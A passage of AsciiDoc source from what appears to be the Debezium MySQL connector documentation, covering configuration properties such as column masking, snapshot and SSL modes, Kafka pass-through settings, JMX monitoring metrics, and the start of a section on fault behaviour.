`column.exclude.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event record values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-include-list]]<<mysql-property-column-include-list, `column.include.list`>>\n|_empty string_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to include in change event record values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-truncate-to-length-chars]]<<mysql-property-column-truncate-to-length-chars, `column.truncate.to{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event record values if the field values are longer than the specified number of characters. You can configure multiple properties with different lengths in a single configuration. The length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-with-length-chars]]<<mysql-property-column-mask-with-length-chars, `column.mask.with{zwsp}._length_.chars`>>\n|_n\/a_\n|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. You can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_.\n\n|[[mysql-property-column-mask-hash]]<<mysql-property-column-mask-hash, `column.mask{zwsp}.hash._hashAlgorithm_{zwsp}.with.salt._salt_`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in the change event record values. Pseudonyms consist of the hashed value obtained by applying the algorithm `_hashAlgorithm_` and salt `_salt_`. +\n +\nBased on the hash function used, referential integrity is kept while data is pseudonymized. Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.\nThe hash result is automatically shortened to the length of the column. +\n +\nYou can configure multiple properties with different lengths in a single configuration. Each length must be a positive integer or zero. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_. For example: +\n +\n`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName` +\n +\n`CzQMA0cB5K` is a randomly selected salt.\n +\nDepending on the configured `_hashAlgorithm_`, the selected `_salt_`, and the actual data set, the resulting masked data set might not be completely anonymized.\n\n|[[mysql-property-column-propagate-source-type]]<<mysql-property-column-propagate-source-type, `column.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters: \n\n`pass:[_]pass:[_]{prodname}.source.column.type` \n\n`pass:[_]pass:[_]{prodname}.source.column.length` \n \n`pass:[_]pass:[_]{prodname}.source.column.scale` \n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified names for columns are of one of these forms: \n\n_databaseName_._tableName_._columnName_ \n\n_databaseName_._schemaName_._tableName_._columnName_\n\n|[[mysql-property-datatype-propagate-source-type]]<<mysql-property-datatype-propagate-source-type, `datatype.propagate{zwsp}.source.type`>>\n|_n\/a_\na|An optional, comma-separated list of regular expressions that match the database-specific data type name of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change event records. These schema parameters: \n \n`pass:[_]pass:[_]debezium.source.column.type` \n\n`pass:[_]pass:[_]debezium.source.column.length`\n\n`pass:[_]pass:[_]debezium.source.column.scale` \n\nare used to propagate the original type name and length for variable-width types, respectively. This is useful to properly size corresponding columns in sink databases. Fully-qualified data type names are of one of these forms: \n\n_databaseName_._tableName_._typeName_ \n\n_databaseName_._schemaName_._tableName_._typeName_ \n \nSee {link-prefix}:{link-mysql-connector}#mysql-data-types[how MySQL connectors map data types] for the list of MySQL-specific data type names.\n\n|[[mysql-property-time-precision-mode]]<<mysql-property-time-precision-mode, `time.precision.mode`>>\n|`adaptive_time{zwsp}_microseconds`\n|Time, date, and timestamps can be represented with different kinds of precision, including: +\n +\n`adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds. +\n +\nifdef::community[]\n`adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +\nendif::community[]\n +\n`connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which use millisecond precision regardless of the database columns' precision.\n\n|[[mysql-property-decimal-handling-mode]]<<mysql-property-decimal-handling-mode,`decimal.handling.mode`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[mysql-property-bigint-unsigned-handling-mode]]<<mysql-property-bigint-unsigned-handling-mode, `bigint.unsigned{zwsp}.handling.mode`>>\n|`long`\n|Specifies how BIGINT UNSIGNED columns should be represented in change events. Possible settings are: +\n +\n `long` represents values by using Java's `long`, which might not offer the precision but which is easy to use in consumers. `long` is usually the preferred setting. +\n +\n`precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events by using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type. Use this setting when working with values larger than 2^63, because these values cannot be conveyed by using `long`.\n\n|[[mysql-property-include-schema-changes]]<<mysql-property-include-schema-changes, `include.schema{zwsp}.changes`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded by using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. \n\n|[[mysql-property-include-query]]<<mysql-property-include-query, `include.query`>>\n|`false`\n|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +\n +\nIf you set this option to `true` then you must also configure MySQL with the `binlog_rows_query_log_events` option set to `ON`. When `include.query` is `true`, the query is not present for events that the snapshot process generates. +\n +\nSetting `include.query`to `true` might expose tables or fields explicitly excluded or masked by including the original SQL statement in the change event. For this reason, the default setting is `false`.\n\n|[[mysql-property-event-processing-failure-handling-mode]]<<mysql-property-event-processing-failure-handling-mode, `event.processing{zwsp}.failure.handling.mode`>>\n|`fail`\n|Specifies how the connector should react to exceptions during deserialization of binlog events. +\n +\n`fail` propagates the exception, which indicates the problematic event and its binlog offset, and causes the connector to stop. +\n +\n`warn` logs the problematic event and its binlog offset and then skips the event. +\n +\n`skip` passes over the problematic event and does not log anything.\n\n|[[mysql-property-inconsistent-schema-handling-mode]]<<mysql-property-inconsistent-schema-handling-mode, `inconsistent.schema{zwsp}.handling.mode`>>\n|`fail`\n|Specifies how the connector should react to binlog events that relate to tables that are not present in internal schema representation. That is, the internal representation is not consistent with the database. +\n +\n`fail` throws an exception that indicates the problematic event and its binlog offset, and causes the connector to stop. +\n +\n`warn` logs the problematic event and its binlog offset and skips the event. +\n +\n`skip` passes over the problematic event and does not log anything.\n\n|[[mysql-property-max-queue-size]]<<mysql-property-max-queue-size, `max.queue.size`>>\n|`8192`\n|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slow or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector. Defaults to 8192, and should always be larger than the maximum batch size specified by the `max.batch.size` property.\n\n|[[mysql-property-max-batch-size]]<<mysql-property-max-batch-size, `max.batch.size`>>\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|[[mysql-property-poll-interval-ms]]<<mysql-property-poll-interval-ms, `poll.interval.ms`>>\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.\n\n|[[mysql-property-connect-timeout-ms]]<<mysql-property-connect-timeout-ms, `connect.timeout.ms`>>\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|[[mysql-property-gtid-source-includes]]<<mysql-property-gtid-source-includes, `gtid.source.includes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that match one of these include patterns are used.\nDo not also specify a setting for `gtid.source.excludes`.\n\n|[[mysql-property-gtid-source-excludes]]<<mysql-property-gtid-source-excludes, `gtid.source.excludes`>>\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources that do not match any of these exclude patterns are used. Do not also specify a value for `gtid.source.includes`.\n\nifdef::community[]\n|[[mysql-property-gtid-new-channel-position]]<<mysql-property-gtid-new-channel-position, `gtid.new.channel.position`>> +\n_deprecated and scheduled for removal_\n|`earliest`\n|When set to `latest`, when the connector sees a new GTID channel, it starts consuming from the last executed transaction in that GTID channel. If set to `earliest` (default), the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have an active-passive MySQL setup where {prodname} is connected to the primary server. In this case, during failover, the replica with the new UUID (and GTID channel) starts receiving writes before {prodname} is connected. These writes would be lost when using `latest`.\nendif::community[]\n\n|[[mysql-property-tombstones-on-delete]]<<mysql-property-tombstones-on-delete, `tombstones.on.delete`>>\n|`true`\n|Controls whether a delete event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a delete event and a subsequent tombstone event. +\n +\n`false` - only a delete event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row. \n\n|[[mysql-property-message-key-columns]]<<mysql-property-message-key-columns, `message.key.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format (shown with spaces for clarity only) is: +\n +\n_database-name_ `.` _table-name_ `:` _regexp_ `;` ... +\n +\nFor example: +\n +\n`dbA.table_a:regex_1;dbB.table_b:regex_2;dbC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in the `id` column of `table_a` to a key field in change events that the connector sends to Kafka. \n\n|[[mysql-property-binary-handling-mode]]<<mysql-property-binary-handling-mode,`binary.handling.mode`>>\n|bytes\n|Specifies how binary columns, for example, `blob`, `binary`, `varbinary`, should be represented in change events. Possible settings: +\n +\n`bytes` represents binary data as a byte array. +\n +\n`base64` represents binary data as a base64-encoded String. +\n +\n`hex` represents binary data as a hex-encoded (base16) String.\n\n|===\n\n[id=\"mysql-advanced-connector-configuration-properties\"]\n.Advanced MySQL connector configuration properties\n\nThe following table describes {link-prefix}:{link-mysql-connector}#mysql-advanced-connector-configuration-properties[advanced MySQL connector properties]. The default values for these properties rarely need to be changed. Therefore, you do not need to specify them in the connector configuration.\n\n.Descriptions of MySQL connector advanced configuration properties\n[cols=\"30%a,20%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-connect-keep-alive]]<<mysql-property-connect-keep-alive, `connect.keep.alive`>>\n|`true`\n|A Boolean value that specifies whether a separate thread should be used to ensure that the connection to the MySQL server\/cluster is kept alive.\n\n|[[mysql-property-table-ignore-builtin]]<<mysql-property-table-ignore-builtin, `table.ignore{zwsp}.builtin`>>\n|`true`\n|A Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table include and exclude lists. By default, system tables are excluded from having their changes captured, and no events are generated when changes are made to any system tables.\n\n|[[mysql-property-database-history-kafka-recovery-poll-interval-ms]]<<mysql-property-database-history-kafka-recovery-poll-interval-ms, `database.history{zwsp}.kafka.recovery{zwsp}.poll.interval.ms`>>\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|[[mysql-property-database-history-kafka-recovery-attempts]]<<mysql-property-database-history-kafka-recovery-attempts, `database.history{zwsp}.kafka.recovery{zwsp}.attempts`>>\n|`4`\n|The maximum number of times that the connector should try to read persisted history data before the connector recovery fails with an error. The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|[[mysql-property-database-history-skip-unparseable-ddl]]<<mysql-property-database-history-skip-unparseable-ddl, `database.history{zwsp}.skip.unparseable{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should ignore malformed or unknown database statements or stop processing so a human can fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when the binlog is being processed.\n\n|[[mysql-property-database-history-store-only-monitored-tables-ddl]]<<mysql-property-database-history-store-only-monitored-tables-ddl, `database.history{zwsp}.store.only{zwsp}.monitored.tables{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should record all DDL statements +\n +\n`true` records only those DDL statements that are relevant to tables whose changes are being captured by {prodname}. Set to `true` with care because missing data might become necessary if you change which tables have their changes captured. +\n +\nThe safe default is `false`.\n\n|[[mysql-property-database-ssl-mode]]<<mysql-property-database-ssl-mode, `database.ssl.mode`>>\n|`disabled`\n|Specifies whether to use an encrypted connection. Possible settings are: +\n +\n`disabled` specifies the use of an unencrypted connection. +\n +\n`preferred` establishes an encrypted connection if the server supports secure connections. If the server does not support secure connections, falls back to an unencrypted connection. +\n +\n`required` establishes an encrypted connection or fails if one cannot be made for any reason. +\n +\n`verify_ca` behaves like `required` but additionally it verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and fails if the server TLS certificate does not match any valid CA certificates. +\n +\n`verify_identity` behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|[[mysql-property-binlog-buffer-size]]<<mysql-property-binlog-buffer-size, `binlog.buffer.size`>>\n|0\n|The size of a look-ahead buffer used by the binlog reader. The default setting of `0` disables buffering. +\n +\nUnder specific conditions, it is possible that the MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. +\n +\nWhen a beginning of a transaction is detected then {prodname} tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can determine whether to stream the changes from the transaction.\nThe size of the binlog buffer defines the maximum number of changes in the transaction that {prodname} can buffer while searching for transaction boundaries.\nIf the size of the transaction is larger than the buffer then {prodname} must rewind and re-read the events that have not fit into the buffer while streaming. +\n +\nNOTE: This feature is incubating. Feedback is encouraged. It is expected that this feature is not completely polished.\n\n|[[mysql-property-snapshot-mode]]<<mysql-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for running a snapshot when the connector starts. Possible settings are: +\n +\n`initial` - the connector runs a snapshot only when no offsets have been recorded for the logical server name. +\n +\n`when_needed` - the connector runs a snapshot upon startup whenever it deems it necessary. That is, when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server. +\n +\n`never` - the connector never uses snapshots. Upon first startup with a logical server name, the connector reads from the beginning of the binlog. Configure this behavior with care. It is valid only when the binlog is guaranteed to contain the entire history of the database. +\n +\n`schema_only` - the connector runs a snapshot of the schemas and not the data. This setting is useful when you do not need the topics to contain a consistent snapshot of the data but need them to have only the changes since the connector was started. +\n +\n`schema_only_recovery` - this is a recovery setting for a connector that has already been capturing changes. When you restart the connector, this setting enables recovery of a corrupted or lost database history topic. You might set it periodically to \"clean up\" a database history topic that has been growing unexpectedly. Database history topics require infinite retention.\n\n|[[mysql-property-snapshot-locking-mode]]<<mysql-property-snapshot-locking-mode, `snapshot.locking{zwsp}.mode`>>\n|`minimal`\na|Controls whether and how long the connector holds the global MySQL read lock, which prevents any updates to the database, while the connector is performing a snapshot. Possible settings are: +\n +\n`minimal` - the connector holds the global read lock for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global read lock is no longer held and other MySQL clients are updating the database. +\n +\n`minimal_percona` - the connector holds link:https:\/\/www.percona.com\/doc\/percona-server\/5.7\/management\/backup_locks.html[the global backup lock] for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global backup lock is no longer held and other MySQL clients are updating the database. This mode does not flush tables to disk, is not blocked by long-running reads, and is available only in Percona Server. +\n +\n`extended` - blocks all writes for the duration of the snapshot. Use this setting if there are clients that are submitting operations that MySQL excludes from REPEATABLE READ semantics. +\n +\n`none` - prevents the connector from acquiring any table locks during the snapshot. While this setting is allowed with all snapshot modes, it is safe to use if and _only_ if no schema changes are happening while the snapshot is running. For tables defined with MyISAM engine, the tables would still be locked despite this property being set as MyISAM acquires a table lock. This behavior is unlike InnoDB engine, which acquires row level locks.\n\n|[[mysql-property-snapshot-select-statement-overrides]]<<mysql-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events captured from the binlog. Specify a comma-separated list of fully-qualified table names in the form _databaseName{zwsp}.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}._DB_NAME_._TABLE_NAME_`. For example, the name of the other configuration property might be: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}.customers{zwsp}.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[mysql-property-min-row-count-to-stream-results]]<<mysql-property-min-row-count-to-stream-results, `min.row.count.to{zwsp}.stream.results`>>\n|`1000`\n|During a snapshot, the connector queries each table for which the connector is configured to capture changes. The connector uses each query result to produce a read event that contains data for all rows in that table. This property determines whether the MySQL connector puts results for a table into memory, which is fast but requires large amounts of memory, or streams the results, which can be slower but work for very large tables. The setting of this property specifies the minimum number of rows a table must contain before the connector streams results. +\n +\nTo skip all table size checks and always stream all results during a snapshot, set this property to `0`.\n\n|[[mysql-property-heartbeat-interval-ms]]<<mysql-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. \n\n|[[mysql-property-heartbeat-topics-prefix]]<<mysql-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_heartbeat.topics.prefix_._server.name_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mysql-property-database-initial-statements]]<<mysql-property-database-initial-statements, `database.initial{zwsp}.statements`>>\n|\n|A semicolon separated list of SQL statements to be executed when a JDBC connection, not the connection that is reading the transaction log, to the database is established.\nTo specify a semicolon as a character in a SQ statement and not as a delimiter, use two semicolons, (`;;`). +\n +\nThe connector might establish JDBC connections at its own discretion, so this property is ony for configuring session parameters. It is not for executing DML statements.\n\n|[[mysql-property-snapshot-delay-ms]]<<mysql-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors. \n\n|[[mysql-property-snapshot-fetch-size]]<<mysql-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[mysql-property-snapshot-lock-timeout-ms]]<<mysql-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[how MySQL connectors perform database snapshots].\n\n|[[mysql-property-enable-time-adjuster]]<<mysql-property-enable-time-adjuster, `enable.time{zwsp}.adjuster`>>\n|`true`\n|Boolean value that indicates whether the connector converts a 2-digit year specification to 4 digits. Set to `false` when conversion is fully delegated to the database. +\n +\nMySQL allows users to insert year values with either 2-digits or 4-digits. For 2-digit values, the value gets mapped to a year in the range 1970 - 2069. The default behavior is that the connector does the conversion. \n\nifdef::community[]\n|[[mysql-property-source-struct-version]]<<mysql-property-source-struct-version, `source.struct{zwsp}.version`>>\n|`v2`\n|Schema version for the `source` block in {prodname} events. {prodname} 0.10 introduced a few breaking changes to the structure of the `source` block in order to unify the exposed structure across all the connectors. +\n +\nBy setting this option to `v1`, the structure used in earlier versions can be produced. However, this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mysql-property-sanitize-field-names]]<<mysql-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key{zwsp}.converter` or `value{zwsp}.converter` property to the Avro converter. +\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[mysql-property-skipped-operations]]<<mysql-property-skipped-operations, `skipped.operations`>>\n|\n|Comma-separated list of oplog operations to skip during streaming. Values that you can specify are: `c` for inserts, `u` for updates, `d` for deletes. By default, no operations are skipped.\n\n|===\n\n[id=\"mysql-pass-through-configuration-properties\"]\n.Pass-through configuration properties\n\nThe MySQL connector also supports {link-prefix}:{link-mysql-connector}#mysql-pass-through-configuration-properties[pass-through configuration properties] that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history. All properties that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector start-up.\n\nFor example, the following connector configuration properties can be used to secure connections to the Kafka broker:\n\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nSee link:{link-kafka-docs}.html[the Kafka documentation] for more details about _pass-through_ properties.\n\n[id=\"mysql-pass-through-properties-for-database-drivers\"]\n.Pass-through properties for database drivers\n\nIn addition to the pass-through properties for the Kafka producer and consumer, there are {link-prefix}:{link-mysql-connector}#mysql-pass-through-properties-for-database-drivers[pass-through properties for database drivers]. These properties have the `database.` prefix. For example, `database.tinyInt1isBit=false` is passed to the JDBC URL.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mysql-connector-performance\n\/\/ Title: Monitoring {prodname} MySQL connector performance\n[[mysql-monitoring]]\n== Monitoring\n\nThe {prodname} MySQL connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-mysql-connector}#mysql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-mysql-connector}#mysql-binlog-metrics[Binlog metrics] provide information about connector operation when the connector is reading the binlog.\n* {link-prefix}:{link-mysql-connector}#mysql-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-mysql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of MySQL databases\n[[mysql-monitoring-snapshots]]\n[[mysql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the `HoldingGlobalLock` custom snapshot metric. This metric is set to a Boolean value that indicates whether the connector currently holds a global or table write lock. \n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-binlog-reading\n\/\/ Title: Monitoring {prodname} MySQL connector binlog reading\n[[mysql-connector-binlog-metrics]]\n[[mysql-binlog-metrics]]\n=== Binlog metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=binlog,server=<database.server.name>`.\n\nTransaction-related attributes are available only if binlog event buffering is enabled. See {link-prefix}:{link-mysql-connector}#mysql-property-binlog-buffer-size[`binlog.buffer.size`] in the advanced connector configuration properties for more details.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the following custom binlog metrics:\n\n.Descriptions of custom binlog metrics\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog file that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set processed by the connector when reading the binlog.\n\n|`NumberOfSkipped{zwsp}Events`\n|`long`\n|The number of events that have been skipped by the MySQL connector. Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfRolledBack{zwsp}Transactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWell{zwsp}FormedTransactions`\n|`long`\n|The number of transactions that have not conformed to the expected protocol of `BEGIN` + `COMMIT`\/`ROLLBACK`. This value should be `0` under normal conditions.\n\n|`NumberOfLarge{zwsp}Transactions`\n|`long`\n|The number of transactions that have not fit into the look-ahead buffer. For optimal performance, this value should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions`.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-schema history\n\/\/ Title: Monitoring {prodname} MySQL connector schema history\n[[mysql-monitoring-schema-history]]\n[[mysql-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MySQL connectors handle faults and problems\n[[mysql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record. \n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections: \n\n* xref:debezium-mysql-connector-configuration-and-startup-errors[]\n* xref:mysql-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mysql-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mysql-kafka-connect-process-crashes[]\n* xref:debezium-mysql-kafka-process-becomes-unavailable[]\n* xref:mysql-purges-binlog-files-used-by-debezium[]\n\nendif::product[]\n\n[id=\"debezium-mysql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to the MySQL server by using the specified connection parameters.\n* The connector is attempting to restart at a position in the binlog for which MySQL no longer has the history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the MySQL problem, restart the connector.\n\n[id=\"mysql-becomes-unavailable-while-debezium-is-running\"]\n=== MySQL becomes unavailable\n\nIf your MySQL server becomes unavailable, the {prodname} MySQL connector fails with an error and the connector stops. When the server is available again, restart the connector.\n\nHowever, if GTIDs are enabled for a highly available MySQL cluster, you can restart the connector immediately. It will connect to a different MySQL server in the cluster, find the location in the server's binlog that represents the last transaction, and begin reading the new server's binlog from that specific location.\n\nIf GTIDs are not enabled, the connector records the binlog position of only the MySQL server to which it was connected. To restart from the correct binlog position, you must reconnect to that specific 